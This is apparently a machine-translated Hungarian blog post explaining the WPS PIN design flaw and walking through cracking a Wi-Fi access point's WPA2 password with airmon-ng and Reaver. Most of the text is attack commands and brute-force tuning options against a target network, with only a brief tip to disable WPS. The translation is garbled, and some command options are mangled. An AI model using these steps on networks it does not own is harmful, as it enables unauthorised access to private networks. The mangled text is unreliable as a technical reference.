Wifi hacker WPS (hogyan lehet növelni védelméhez való hozzáférési pont)

Gyakran előfordul, hogy üzembe szuper megaslozhny (azaz hosszú) WPA2 jelszót a hozzáférési pont elcsépelt emberek elfelejteni WPS (Wi-Fi Protected Setup). (Ez jó, amíg el nem érik 4g router). Szóval, milyen állat „WPS”? WPS - technológia, amely megkönnyíti az ügyfél beállítási dolgozni egy vezeték nélküli hozzáférési pont.

A készülék egy 8 számjegyű PIN-kód (7 számjeggyel, a nyolcadik - vezérlő, alapján kerül kiszámításra az első hét). Átvitele a PIN-pont a készülék válaszul megkapja a fennmaradó paramétereket (ESSID név és a PSK - jelszót) titkosítatlanul kikerültek. Így a hét számjegy PIN-kódot. Ez tízmillió kombinációk. Annak ellenőrzésére, pin kód vesz néhány másodperc és fél percig. Túl hosszú.

De ez csak egy végzetes hiba történt a WPS szabvány. Kiderült, a PIN van jelölve két szakaszban történik. Meg van osztva felét, és mindegyik rész külön tesztelhető!

A nagyon folyamat hitelesítési adatok cseréjére is képviselteti formájában 8 üzenet. MESSAGE1 megy az ügyfél a hozzáférési ponthoz. MESSAGE2 - visszamegy (válasz), és így tovább.

Nos, furcsa ebben a helyzetben az, hogy EAP_NACK csomag (kapcsolat alaphelyzetbe, ha a hitelesítés nem sikerül), az ügyfél megkapja az üzenetet M4, amikor az első része a PIN kód hibás. És ugyanaz az üzenet M6, ha a második rész hamis.

Menj a legtöbb diszfunkcionális forgatókönyv tanulni az első része a PIN-kódot, akkor kell átmenni 0000-9999 = 10.000 lehetőség! És megtudja az utolsó három számjegy 000-999 - tovább 1000. Összesen 11.000 lehetőségeket! Már sokkal kevesebb, mint 10 millió, ahogy korábban.

Ez segít, hogy automatizálják a válogatás segédprogram Reaver, amely már létezik a Kali Linux csomagot. Használd csak borzasztó.

Állapotok közzétételi jelszót a WPS hozzáférési pont

  1. Kapunk a hozzáférési pontok listája a WPS.
    Erre azt használja a konzolt wpa_cli, a parancssor következetesen bemutatni scan és scan_results. Van keresek egy pont a módszer [WPS];
  2. Nagyítás antennát, hogy a jel minősége a legjobb volt. Van egy irányított antenna TP-LINK TL-ANT2414A

Wifi hacker WPS (hogyan lehet növelni védelméhez való hozzáférési pont)

Azt ellenőrizze a jel minőségét segítségével airodump-ng mon0. ahol mon0 - interfész monitor módban. Minél magasabb az érték, annál jobb a jel. Ideális esetben ez több -60. Ha van egy olyan pont, amelyre a -50 vagy magasabb

# Airmon-ng
Interface Chipset illesztőprogram

wlan0 Ismeretlen brcmsmac - [phy0]
wlan1 Ralink RT2870 / 3070 rt2800usb - [phy1]

root @ kali:

# Airmon-ng indul wlan1
Will mon0 interfész
  • Hadd mellszobor
    root @ kali:

    # Reaver -i mon0 -B 84: C9: **: **: **: ** -VA (zárt csillag, hogy ne égnek)

  • Az eredmény jött egy pár órát:

    Ez így van, és hogy megvédje a csorbát ki kell húzni WPS beállítások a hozzáférési pont. Nem így szükséges a témában. Bár az átadás jelszavakat a lehető leghamarabb. Légy éber!

    Optimization Options mellszobor

    Beállíthatjuk, hogy a csatorna és az SSID a hozzáférési pont:
    # Reaver -i mon0 -b 00: 01: 02: 03: 04: 05 11 -c -e Linksys
    Jótékony hatással van a sebesség opció brute force „-dh-kicsi”, amely meghatározza a kis értéke a titkos kulcsot, megkönnyítve ezzel számítások oldalán a hozzáférési pont:
    # Reaver -i mon0 -b 00: 01: 02: 03: 04: 05 -vv --dh kicsi
    Timeout Az alapértelmezett válasz öt másodperc. meg lehet változtatni, ha szükséges:
    # Reaver -i mon0 -b 00: 01: 02: 03: 04: 05 -t 2
    A késleltetés kísérletek között alapértelmezésben egy másodperc. Azt is meg lehet konfigurálni:
    # Reaver -i mon0 -b 00: 01: 02: 03: 04: 05 -d 0
    Néhány hozzáférési pont WPS képes blokkolni egy ideig, gyanítva, hogy megpróbálják dugni. Reaver észreveszi ezt a helyzetet, és szünetelteti a iterációt az alapértelmezett 315 másodperc, a szünet hossza módosítható:
    # Reaver -i mon0 -b 00: 01: 02: 03: 04: 05 --lock-delay = 250
    Néhány implementáció a protokoll WPS megtöri a kapcsolatot a rossz PIN-kódot, bár a leírás vissza kell térnie az adott üzenet. Reaver automatikusan felismeri ezt a helyzetet, ez egy lehetőség „-nack”:
    # Reaver -i mon0 -b 00: 01: 02: 03: 04: 05 --nack
    Option „-eap-megszüntetésére” úgy tervezték, hogy az AP, amely előírja, WPS-munkamenet teljes üzenetet EAP FAIL:
    # Reaver -i mon0 -b 00: 01: 02: 03: 04: 05---eap megszüntetésére
    A hibák előfordulása a WPS-session azt jelezheti, hogy az AP korlátozza a kísérletek számát adja meg a PIN-kódot, vagy egyszerűen túlterhelt kéréseket. Ezek az információk jelennek meg a képernyőn. Ebben az esetben a Reaver felfüggeszteni tevékenységüket, és szüneteket lehet beállítani a „-fail-wait” beállítást:
    # Reaver -i mon0 -b 00: 01: 02: 03: 04: 05---fail várakozás = 360

    Ön is élvezheti:

    Wifi hacker WPS (hogyan lehet növelni védelméhez való hozzáférési pont)
    Mennyire biztonságos az otthoni Wi-Fi? (Vedd fel a jelszót a WiFi)
    Wifi hacker WPS (hogyan lehet növelni védelméhez való hozzáférési pont)
    Beállítása Multi-SSID a DWL-3260AP hozzáférési pont
    Wifi hacker WPS (hogyan lehet növelni védelméhez való hozzáférési pont)
    hozzáférési kapcsolók Raisesom Tor hálózathoz való hozzáférés magánépítkezéseken
    Wifi hacker WPS (hogyan lehet növelni védelméhez való hozzáférési pont)
    Tanulmányozzuk a konfiguráció ACL hozzáférés Cisco
    Wifi hacker WPS (hogyan lehet növelni védelméhez való hozzáférési pont)
    Hogyan lehet növelni a konverziós oldalon

    Kapcsolódó cikkek